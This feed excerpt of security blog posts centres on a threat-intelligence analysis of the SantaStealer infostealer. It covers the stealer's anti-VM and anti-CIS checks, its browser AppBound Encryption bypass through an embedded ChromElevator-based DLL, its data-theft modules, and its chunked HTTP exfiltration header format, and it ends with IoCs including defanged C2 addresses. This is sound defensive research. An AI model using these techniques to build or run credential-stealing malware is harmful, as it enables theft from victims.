data to backend cloud systems raises questions about where sensitive conversations are stored, how long that data is retained, and who ultimately has access to it. When such technologies are introduced into meeting rooms or business workflows, they essentially become an always-on sensor within the organization, and its presence may not be fully accounted for in most organizations with existing acceptable use policies. This highlights the need for organizations to reassess how emerging mobile and wearable technologies could impact their data protection, confidentiality, and overall security posture.</span></p><p></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt61a785128a23d53f/69611b13f6c32b0008b1c6e0/CES2026-iot-4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="CES2026-iot-4.png" asset-alt="CES2026-iot-4.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt61a785128a23d53f/69611b13f6c32b0008b1c6e0/CES2026-iot-4.png" data-sys-asset-uid="blt61a785128a23d53f" data-sys-asset-filename="CES2026-iot-4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="CES2026-iot-4.png" sys-style-type="display"/></figure><h2><span style='color:rgb(67, 67, 67);'>Conclusion: Building a new infrastructure of trust</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>My observations from CES 2026 clearly illustrate that the evolution of IoT has moved us beyond securing individual devices. The true security challenge now lies within the highly interconnected ecosystems, centralized AI-driven automation, and "always-on" data collection that underpin our increasingly "smart" world. The operationalization of AI and the rapid progress in robotics introduce centralized trust relationships and vast new data streams that are not yet matched by adequate security considerations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This shift presents an urgent call to action for organizations. It’s time to aggressively reassess acceptable use and data protection policies to account for continuously sensing wearables, autonomous machinery, and the security of the backend services that control them all. The future of security is no longer just about protecting the perimeter; it is about securing the entire infrastructure of trust, data integrity, and automated decision-making that powers the next generation of technology.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-beyond-devices-exploring-new-security-risks-interconnected-iot-ces-2026</link>
      <guid isPermaLink="false">blt874084444a33b15b</guid>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[IoT]]></category>
      <category><![CDATA[Artificial Intelligence]]></category><dc:creator><![CDATA[Deral Heiland]]></dc:creator>
      <pubDate>Fri, 09 Jan 2026 15:11:35 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3cc8c945f314ec1f/68b9a045a7d14357b3ba893b/blog-hero-texture-lines.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[SantaStealer is Coming to Town: A New, Ambitious Infostealer Advertised on Underground Forums]]></title>
      <description><![CDATA[<p><strong>Update from December 16, 2025</strong>: Shortly after publishing this blog post, we have observed a message from the official SantaStealer telegram channel announcing the release of the stealer. This means the stealer is now deemed production-ready by the developers and can be expected in the wild. Below is a screenshot of the original message in Russian as well as our translation to English.</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc10eceaf39c15777/69416047dc686eb78fd0f4ec/0-release-announcement-translated.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="0-release-announcement-translated.png" asset-alt="0-release-announcement-translated.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc10eceaf39c15777/69416047dc686eb78fd0f4ec/0-release-announcement-translated.png" data-sys-asset-uid="bltc10eceaf39c15777" data-sys-asset-filename="0-release-announcement-translated.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="0-release-announcement-translated.png" sys-style-type="display"/></figure><p style="text-align: center;">Figure 0: A message announcing the release of SantaStealer in Russian (left) and our translation to English (right)</p><h2>Summary</h2><p>Rapid7 Labs has identified a new malware-as-a-service information stealer being actively promoted through Telegram channels and on underground hacker forums. The stealer is advertised under the name “SantaStealer” and is planned to be released before the end of 2025. Open source intelligence suggests that it recently underwent a rebranding from the name “BluelineStealer.”</p><p>The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection. Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP.</p><p>While the stealer is advertised as “fully written in C”, featuring a “custom C polymorphic engine” and being “fully undetected,” Rapid7 has found unobfuscated and unstripped SantaStealer samples that allow for an in-depth analysis. These samples can shed more light on this malware’s true level of sophistication.</p><h2>Discovery</h2><p>In early December 2025, Rapid7 identified a Windows executable triggering a generic infostealer detection rule, which we usually see triggered by samples from the Raccoon stealer family. Initial inspection of the sample (SHA-256 beginning with 1a27…) revealed a 64-bit DLL with over 500 exported symbols (all bearing highly descriptive names such as “payload_main”, “check_antivm” or “browser_names”) and a plethora of unencrypted strings that clearly hinted at credential-stealing capabilities.</p><p>While it is not clear why the malware authors chose to build a DLL, or how the stealer payload was to be invoked by a potential stager, this choice had the (presumably unintended) effect of including the name of every single function and global variable not declared as static in the executable’s export directory. Even better, this includes symbols from statically linked libraries, which we can thus identify with minimal effort.</p><p>The statically linked libraries in this particular DLL include:</p><ul><li>cJSON, an “ultralightweight JSON parser”</li><li>miniz, a “single C source file zlib-replacement library”</li><li>sqlite3, the C library for interfacing with SQLite v3</li></ul><p>Another pair of exported symbols in the DLL are named notes_config_size and notes_config_data. These point to a string containing the JSON-encoded stealer configuration, which contains, among other things, a banner (“watermark”) with Unicode art spelling “SANTA STEALER” and a link to the stealer Telegram channel, t[.]me/SantaStealer.</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb07eeaf664480aaa/693ffe28bbc217a1ee5d2f6a/1-config-json.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="1-config-json.png" asset-alt="1-config-json.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb07eeaf664480aaa/693ffe28bbc217a1ee5d2f6a/1-config-json.png" data-sys-asset-uid="bltb07eeaf664480aaa" data-sys-asset-filename="1-config-json.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="1-config-json.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 1: A preview of the stealer’s configuration</span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltba94de22f4ac0822/693ffe2a20e7a426a439d105/2-tg_screen.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="2-tg_screen.png" asset-alt="2-tg_screen.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltba94de22f4ac0822/693ffe2a20e7a426a439d105/2-tg_screen.png" data-sys-asset-uid="bltba94de22f4ac0822" data-sys-asset-filename="2-tg_screen.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="2-tg_screen.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 2: A Telegram message from November 25th advertising the rebranded SantaStealer</span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcf4e679b3f47edee/693ffe28dc686e4ef3d0eeb2/3-tg_screen2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="3-tg_screen2.png" asset-alt="3-tg_screen2.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcf4e679b3f47edee/693ffe28dc686e4ef3d0eeb2/3-tg_screen2.png" data-sys-asset-uid="bltcf4e679b3f47edee" data-sys-asset-filename="3-tg_screen2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="3-tg_screen2.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 3: A Telegram message announcing the rebranding and expected release schedule</span></p><p>Visiting SantaStealer’s Telegram channel, we observed the affiliate web panel, where we were able to register an account and access more information provided by the operators, such as a list of features, the pricing model, or the various build configuration options. This allowed us to cross-correlate information from the panel with the configuration observed in samples, and get a basic idea of the ongoing evolution of the stealer.</p><p>Apart from Telegram, the stealer can be found advertised also on the Lolz hacker forum at lolz[.]live/santa/. The use of this Russian-speaking forum, the top-level domain name of the web panel bearing the country code of the Soviet Union (su), and the ability to configure the stealer not to target Russian-speaking victims (described later) hints at Russian citizenship of the operators — not at all unusual on the infostealer market.</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2edd5440d2de2b29/693ffe29019baa0113a80d59/4-webpanel-features.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="4-webpanel-features.png" asset-alt="4-webpanel-features.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2edd5440d2de2b29/693ffe29019baa0113a80d59/4-webpanel-features.png" data-sys-asset-uid="blt2edd5440d2de2b29" data-sys-asset-filename="4-webpanel-features.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="4-webpanel-features.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 4: A list of features advertised in the web panel</span></p><p>As the above screenshot illustrates, the stealer operators have ambitious plans, boasting anti-analysis techniques, antivirus software bypasses, and deployment in government agencies or complex corporate networks. This is reflected in the pricing model, where a basic variant is advertised for $175 per month, and a premium variant is valued at $300 per month, as captured in the following screenshot.</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0a63e7a2a07440bf/693ffe292cf9685ed2b6b06f/5-webpanel-pricing.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="5-webpanel-pricing.png" asset-alt="5-webpanel-pricing.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0a63e7a2a07440bf/693ffe292cf9685ed2b6b06f/5-webpanel-pricing.png" data-sys-asset-uid="blt0a63e7a2a07440bf" data-sys-asset-filename="5-webpanel-pricing.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="5-webpanel-pricing.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 5: Pricing model for SantaStealer (web panel)</span></p><p>In contrast to these claims, the samples we have seen until now are far from undetectable, or in any way difficult to analyze. While it is possible that the threat actor behind SantaStealer is still developing some of the mentioned anti-analysis or anti-AV techniques, having samples leaked before the malware is ready for production use — complete with symbol names and unencrypted strings — is a clumsy mistake likely thwarting much of the effort put into its development and hinting at poor operational security of the threat actor(s).</p><p>Interestingly, the web panel includes functionality to “scan files for malware” (i.e. check whether a file is being detected or not). While the panel assures the affiliate user that no files are shared and full anonymity is guaranteed, one may have doubts about whether this is truly the case.</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2017d02df53bbcde/693ffe27ad236c7de08c8245/6-webpanel-scan.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="6-webpanel-scan.png" asset-alt="6-webpanel-scan.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2017d02df53bbcde/693ffe27ad236c7de08c8245/6-webpanel-scan.png" data-sys-asset-uid="blt2017d02df53bbcde" data-sys-asset-filename="6-webpanel-scan.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="6-webpanel-scan.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 6: Web panel allows to scan files for malware.</span></p><p>Some of the build configuration options within the web panel are shown in Figures 7 through 9.</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9534836d360107bf/693ffe28019baa334da80d55/7-webpanel-build.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="7-webpanel-build.png" asset-alt="7-webpanel-build.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9534836d360107bf/693ffe28019baa334da80d55/7-webpanel-build.png" data-sys-asset-uid="blt9534836d360107bf" data-sys-asset-filename="7-webpanel-build.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="7-webpanel-build.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 7: SantaStealer build configuration</span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4e3620555e41d3af/693ffe29bbc21771a65d2f6e/8-webpanel-build2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="8-webpanel-build2.png" asset-alt="8-webpanel-build2.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4e3620555e41d3af/693ffe29bbc21771a65d2f6e/8-webpanel-build2.png" data-sys-asset-uid="blt4e3620555e41d3af" data-sys-asset-filename="8-webpanel-build2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="8-webpanel-build2.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 8: More SantaStealer build configuration options</span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt652dbc8fdead8ce5/693ffe29ad236c40e08c8249/9-webpanel-build3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="9-webpanel-build3.png" asset-alt="9-webpanel-build3.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt652dbc8fdead8ce5/693ffe29ad236c40e08c8249/9-webpanel-build3.png" data-sys-asset-uid="blt652dbc8fdead8ce5" data-sys-asset-filename="9-webpanel-build3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="9-webpanel-build3.png" sys-style-type="display"/></figure><p style="text-align: center;"><span style='font-size: undefined;'>Figure 9: SantaStealer build configuration options, including CIS countries detection</span></p><p>One final aspect worth pointing out is that, rather unusually, the decision whether to target countries in the Commonwealth of Independent States (CIS) is seemingly left up to the buyer and is not hardcoded, as is often the case with commercial infostealers.</p><h2>Technical analysis of SantaStealer</h2><p>Having read the advertisement of SantaStealer’s capabilities by the developers, one might be interested in seeing how they are implemented on a technical level. Here, we will explore one of the EXE samples (SHA-256 beginning with 926a…), as attempts at executing the DLL builds with rundll32.exe ran into issues with the C runtime initialization. However, the DLL builds (such as SHA-256 beginning with 1a27…) are still useful for static analysis and cross-referencing with the EXE.</p><p>At the moment, detecting and tracking these payloads is straightforward, due to the fact that both the malware configuration and the C2 server IP address are embedded in the executable in plain text. However, if SantaStealer indeed does turn out to be competitive and implements some form of encryption, obfuscation, or anti-analysis techniques (as seen with Lumma or Vidar) these tasks may become less trivial for the analyst. A deeper understanding of the patterns and methods utilized by SantaStealer may be beneficial.</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4d3f7acf3772b32b/693ffe281b4aca5e492cd057/10-send-upload-chunk.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="10-send-upload-chunk.png" asset-alt="10-send-upload-chunk.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4d3f7acf3772b32b/693ffe281b4aca5e492cd057/10-send-upload-chunk.png" data-sys-asset-uid="blt4d3f7acf3772b32b" data-sys-asset-filename="10-send-upload-chunk.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="10-send-upload-chunk.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 10: Code in the send_upload_chunk exported function references plaintext strings</span></p><p>The user-defined entry point in the executable corresponds to the payload_main DLL export. Within this function, the stealer first checks the anti_cis and exec_delay_seconds values from the embedded config and behaves accordingly. If the CIS check is enabled and a Russian keyboard layout is detected using the GetKeyboardLayoutList API, the stealer drops an empty file named “CIS” and ends its execution. Otherwise, SantaStealer waits for the configured number of seconds before calling functions named check_antivm, payload_credentials, create_memory_based_log and creating a thread running the routine named ThreadPayload1 in the DLL exports.</p><p>The anti-VM function is self-explanatory, but its implementation differs across samples, hinting at the ongoing development of the stealer. One sample checks for blacklisted processes (by hashing the names of running process executables using a custom rolling checksum and searching for them in a blacklist), suspicious computer names (using the same method) and an “analysis environment,” which is just a hard-coded blacklist of working directories, like “C:\analysis” and similar. Another sample checks the number of running processes, the system uptime, the presence of a VirtualBox service (by means of a call to OpenServiceA with "VBoxGuest") and finally performs a time-based debugger check. In either case, if a VM or debugger is detected, the stealer ends its execution.</p><p>Next, payload_credentials attempts to steal browser credentials, including passwords, cookies, and saved credit cards. For Chromium-based browsers, this involves bypassing a mechanism known as AppBound Encryption (ABE). For this purpose, SantaStealer embeds an additional executable, either as a resource or directly in section data, which is either dropped to disk and executed (screenshot below), or loaded and executed in-memory, depending on the sample.</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta35d60f4499c66ea/693ffe3c965cdb8f08e52e6a/11-chromelevator.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="11-chromelevator.png" asset-alt="11-chromelevator.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta35d60f4499c66ea/693ffe3c965cdb8f08e52e6a/11-chromelevator.png" data-sys-asset-uid="blta35d60f4499c66ea" data-sys-asset-filename="11-chromelevator.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="11-chromelevator.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 11: Execution of an embedded executable specialized in browser hijacking</span></p><p>The extracted executable, in turn, contains an encrypted DLL in its resources, which is decrypted using two consecutive invocations of ChaCha20 with two distinct pairs of 32-byte key and 12-byte nonce. This DLL exports functions called ChromeElevator_Initialize, ChromeElevator_ProcessAllBrowsers and ChromeElevator_Cleanup, which are called by the executable in that order. Based on the symbol naming, as well as usage of ChaCha20 encryption for obfuscation and presence of many recognizable strings, we assess with moderate confidence that this executable and DLL are heavily based on code from the "ChromElevator" project (https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption), which employs direct syscall-based reflective process hollowing to inject code into the target browser. Hijacking the security context of a legitimate browser process this way allows the attacker to decrypt AppBound encryption keys and thereby decrypt stored credentials.</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt99823e3ea16aa0b1/693ffe3c619296afad6d2eb0/12-chromelevator-memory.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="12-chromelevator-memory.png" asset-alt="12-chromelevator-memory.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt99823e3ea16aa0b1/693ffe3c619296afad6d2eb0/12-chromelevator-memory.png" data-sys-asset-uid="blt99823e3ea16aa0b1" data-sys-asset-filename="12-chromelevator-memory.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="12-chromelevator-memory.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 12: The embedded EXE decrypts and loads a DLL in-memory and calls its exports.</span></p><p>The next function called from main, create_memory_based_log, demonstrates the modular design of the stealer. For each included module, it creates a thread running the module_thread routine with an incremented numerical ID for that module, starting at 0. It then waits for 45 seconds before joining all thread handles and writing all files collected in-memory into a ZIP file named “Log.zip” in the TEMP directory.</p><p>The module_thread routine simply takes the index it was passed as parameter and calls a handler function at that index in a global table, for some reason called memory_generators in the DLL. The module function takes only a single output parameter, which is the number of files it collected. In the so helpfully annotated DLL build, we can see 14 different modules. Besides generic modules for reading environment variables, taking screenshots, or grabbing documents and notes, there are specialized modules for stealing data from the Telegram desktop application, Discord, Steam, as well as browser extensions, histories and passwords.</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte1e2bd504d8da12a/693ffe3cb9ac8a2dc8cbb2f3/13-module-fns.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="13-module-fns.png" asset-alt="13-module-fns.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte1e2bd504d8da12a/693ffe3cb9ac8a2dc8cbb2f3/13-module-fns.png" data-sys-asset-uid="blte1e2bd504d8da12a" data-sys-asset-filename="13-module-fns.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="13-module-fns.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>Figure 13: A list of named module functions in a SantaStealer sample</span></p><p>Finally, after all the files have been collected, ThreadPayload1 is run in a thread. It sleeps for 15 seconds and then calls payload_send, which in turn calls send_zip_from_memory_0, which splits the ZIP into 10 MB chunks that are uploaded using send_upload_chunk.</p><p>The file chunks are exfiltrated over plain HTTP to an /upload endpoint on a hard-coded C2 IP address on port 6767, with only a couple special headers:</p><pre>User-Agent: upload
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary[...]
auth: [...]
w: [...]
complete: true (only on final request)</pre><p>The auth header appears to be a unique build ID, and w is likely the optional “tag” used to distinguish between campaigns or “traffic sources”, as is mentioned in the features.</p><h2>Conclusion</h2><p>The SantaStealer malware is in active development, set to release sometime in the remainder of this month or in early 2026. Our analysis of the leaked builds reveals a modular, multi-threaded design fitting the developers’ description. Some, but not all, of the improvements described in SantaStealer’s Telegram channel are reflected in the samples we were able to analyze. For one, the malware can be seen shifting to a completely fileless collection approach, with modules and the Chrome decryptor DLL being loaded and executed in-memory. On the other hand, the anti-analysis and stealth capabilities of the stealer advertised in the web panel remain very basic and amateurish, with only the third-party Chrome decryptor payload being somewhat hidden.</p><p>To avoid getting infected with SantaStealer, it is recommended to pay attention to unrecognized links and e-mail attachments. Watch out for fake human verification, or technical support instructions, asking you to run commands on your computer. Finally, avoid running any kind of unverified code from sources such as pirated software, videogame cheats, unverified plugins, and extensions.</p><p>Stay safe and off the naughty list!</p><h2>Rapid7 Customers</h2><h3>Intelligence Hub</h3><p>Customers using Rapid7’s Intelligence Hub gain direct access to SantaStealer IOCs, along with ongoing intelligence on new activity and related campaigns. The platform also has detections for a wide range of other infostealers, including Lumma, StealC, RedLine, and more, giving security teams broader visibility into emerging threats.</p><h2>Indicators of compromise (IoCs)</h2><p><strong>SantaStealer DLLs with exported symbols (SHA-256)</strong></p><ul><li>1a277cba1676478bf3d47bec97edaa14f83f50bdd11e2a15d9e0936ed243fd64</li><li>abbb76a7000de1df7f95eef806356030b6a8576526e0e938e36f71b238580704</li><li>5db376a328476e670aeefb93af8969206ca6ba8cf0877fd99319fa5d5db175ca</li><li>a8daf444c78f17b4a8e42896d6cb085e4faad12d1c1ae7d0e79757e6772bddb9</li><li>5c51de7c7a1ec4126344c66c70b71434f6c6710ce1e6d160a668154d461275ac</li><li>48540f12275f1ed277e768058907eb70cc88e3f98d055d9d73bf30aa15310ef3</li><li>99fd0c8746d5cce65650328219783c6c6e68e212bf1af6ea5975f4a99d885e59</li><li>ad8777161d4794281c2cc652ecb805d3e6a9887798877c6aa4babfd0ecb631d2</li><li>73e02706ba90357aeeb4fdcbdb3f1c616801ca1affed0a059728119bd11121a4</li><li>e04936b97ed30e4045d67917b331eb56a4b2111534648adcabc4475f98456727</li><li>66fef499efea41ac31ea93265c04f3b87041a6ae3cd14cd502b02da8cc77cca8</li><li>4edc178549442dae3ad95f1379b7433945e5499859fdbfd571820d7e5cf5033c</li></ul><p><strong>SantaStealer EXEs (SHA-256)</strong></p><ul><li>926a6a4ba8402c3dd9c33ceff50ac957910775b2969505d36ee1a6db7a9e0c87</li><li>9b017fb1446cdc76f040406803e639b97658b987601970125826960e94e9a1a6</li><li>f81f710f5968fea399551a1fb7a13fad48b005f3c9ba2ea419d14b597401838c</li></ul><p><strong>SantaStealer C2s</strong></p><ul><li>31[.]57[.]38[.]244:6767 (AS 399486)</li><li>80[.]76[.]49[.]114:6767 (AS 399486)</li></ul><p><strong>MITRE ATT&CK</strong></p><ul><li>Account Discovery (T1087)</li><li>Automated Exfiltration (T1020)</li><li>Data Compressed (T1002)</li><li>Browser Information Discovery (T1217)</li><li>Archive Collected Data (T1560)</li><li>Data Transfer Size Limits (T1030)</li><li>Archive via Library (T1560.002)</li><li>Automated Collection (T1119)</li><li>Exfiltration Over C2 Channel (T1041)</li><li>Clipboard Data (T1115)</li><li>Debugger Evasion (T1622)</li><li>Email Account (T1087.003)</li><li>File and Directory Discovery (T1083)</li><li>Credentials In Files (T1552.001)</li><li>Credentials from Password Stores (T1555)</li><li>Data from Local System (T1005)</li></ul><ul><li>Credentials from Web Browsers (T1503)</li><li>Financial Theft (T1657)</li><li>Credentials from Web Browsers (T1555.003)</li><li>Credentials in Files (T1081)</li><li>Malware (T1587.001)</li><li>Process Discovery (T1057)</li><li>Local Email Collection (T1114.001)</li><li>Messaging Applications (T1213.005)</li><li>Screen Capture (T1113)</li><li>Server (T1583.004)</li><li>Software Discovery (T1518)</li><li>System Checks (T1497.001)</li><li>DLL (T1574.001)</li><li>System Information Discovery (T1082)</li><li>System Language Discovery (T1614.001)</li><li>Time Based Evasion (T1497.003)</li><li>Virtualization/Sandbox Evasion (T1497)</li><li>Deobfuscate/Decode Files or Information (T1140)</li><li>Web Protocols (T1071.001)</li><li>Private Keys (T1145)</li><li>Private Keys (T1552.004)</li><li>Dynamic API Resolution (T1027.007)</li><li>Steal Application Access Token (T1528)</li><li>Steal Web Session Cookie (T1539)</li><li>Embedded Payloads (T1027.009)</li><li>Encrypted/Encoded File (T1027.013)</li><li>File Deletion (T1070.004)</li><li>File Deletion (T1107)</li><li>Portable Executable Injection (T1055.002)</li><li>Process Hollowing (T1055.012)</li><li>Process Hollowing (T1093)</li><li>Reflective Code Loading (T1620)</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-santastealer-is-coming-to-town-a-new-ambitious-infostealer-advertised-on-underground-forums</link>
      <guid isPermaLink="false">blt0cf4ac1f29d1af1a</guid>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Milan Spinka]]></dc:creator>
      <pubDate>Mon, 15 Dec 2025 10:02:50 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta4e7f53b1fd5f480/693fdd6f039f3e5709756871/SantaStealer-research-Rapid7-Labs.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Geopolitics and Cyber Risk: How Global Tensions Shape the Attack Surface]]></title>
      <description><![CDATA[<p>Geopolitics has become a significant risk factor for today’s organizations, transforming cybersecurity into a technical and strategic challenge heavily influenced by state behavior. International tensions and the strategic calculations of major cyber powers, including Russia, China, Iran, and North Korea, significantly shape the current threat landscape. Businesses can no longer operate as isolated entities; they now function as interconnected global ecosystems where employees, suppliers, cloud workloads, supply chains, and data flows intersect across multiple jurisdictions, each with its own unique set of political risks. </p><p>A region considered low-risk last month could become a high-risk zone overnight if a diplomatic dispute escalates. An overseas development team could suddenly become vulnerable if that region experiences sanctions, stricter regulations, or state pressure on the workforce. </p><p>Many organizations still underestimate this dynamic reality, relying on static risk models that assume relatively stable attack patterns. However, geopolitical decisions and internal vulnerabilities are often the drivers of the most sudden and consequential changes in exposure. For example, the announcement of sanctions can trigger retaliatory cyberattacks, a military buildup can unleash destructive campaigns, and a trade or intellectual property dispute can lead to large-scale espionage. </p><p>Cybersecurity leaders must therefore integrate geopolitical intelligence directly into their operational decision-making and risk assessment processes, recognizing that political forces, rather than technical errors, are often the primary trigger for increased vulnerability.</p><h2>Geopolitics as a core driver of cyber risk</h2><p>Geopolitics plays a decisive role in shaping the scale, direction, and sophistication of cybercriminal and state-sponsored activity, fundamentally altering the threat landscape for organizations worldwide. Geopolitical tensions and sanctions often create conditions in which state-aligned hackers operate with greater freedom, using cyber operations as tools for espionage, economic survival, political retaliation, or strategic influence. Isolated or sanctioned states often turn to cybercrime as an alternative source of revenue. </p><p>North Korea, for instance, intensifies financially motivated campaigns, including cryptocurrency theft and extortion, when economic pressure mounts. Iran, facing recurring sanctions and political isolation, tends to respond with retaliatory or disruptive cyber operations targeting sectors and institutions associated with adversarial nations.  </p><p>China’s cyber activity often peaks during moments of heightened competition over technology and strategic resources, driving expansive espionage campaigns aimed at industries like aerospace, telecommunications, AI, and energy. Russia, meanwhile, escalates disruptive or destructive cyber actions during geopolitical confrontations or military conflicts, leveraging malware, industrial system interference, and coordinated information operations. </p><p>These patterns demonstrate how cyber risk extends far beyond technical vulnerabilities: organizations become targets because of their nationality, sector, technology assets, or global partnerships. </p><h2>How geopolitical tensions influence threat actor behavior</h2><p>Geopolitical tensions influence the behavior of threat actors by altering their objectives, aggression levels, and operational trade-offs in ways that directly impact global organizations. Russian groups, for example, will shift from covert intelligence collection to overt disruption, employing destructive malware, DDoS attacks, and infrastructure sabotage to exert pressure. Chinese actors are known to intensify long-term espionage and supply-chain infiltration, targeting IP, cloud providers, security firms, and development environments.</p><p>Iran responds to sanctions or regional tensions with opportunistic retaliation through data wiping, defacements, and financially motivated attacks. And when facing economic strain, North Korea expands cybercrime, including cryptocurrency theft, extortion, software supply-chain poisoning, and high-level financial fraud.</p><p>For organizations, these shifts manifest internally as newly observed attack patterns, such as targeted phishing aimed at political or strategic sectors, the exploitation of vulnerabilities relevant to conflicts, or supply-chain attacks aligned with espionage objectives. The unifying pattern is that geopolitical tensions cause attackers to reprioritize, whereby espionage becomes a means of destruction, revenue generation becomes a national strategy, and symbolic retaliation becomes an operational necessity. Security teams that do not account for these geopolitical triggers risk misjudging the scale, intent, and urgency of incoming threat campaigns.</p><h2>Indicators that cyber escalation is coming</h2><p>A cyber escalation is rarely an isolated phenomenon; it is usually accompanied by political and technical warning signs that can herald a wave of attacks. On the political front, organizations should monitor events such as sanctions announcements, diplomatic expulsions, military mobilizations, sudden breakdowns in negotiations, strategic military strikes, or public accusations of espionage. For example, tensions with Russia are often followed by cyber influence campaigns. Retaliatory cyberattacks are also common following the imposition of sanctions on the Islamic Republic of Iran. Increased cyber espionage campaigns coincide with periods of strategic competition with China, and financially motivated attacks intensify after economic pressure is exerted on North Korea. 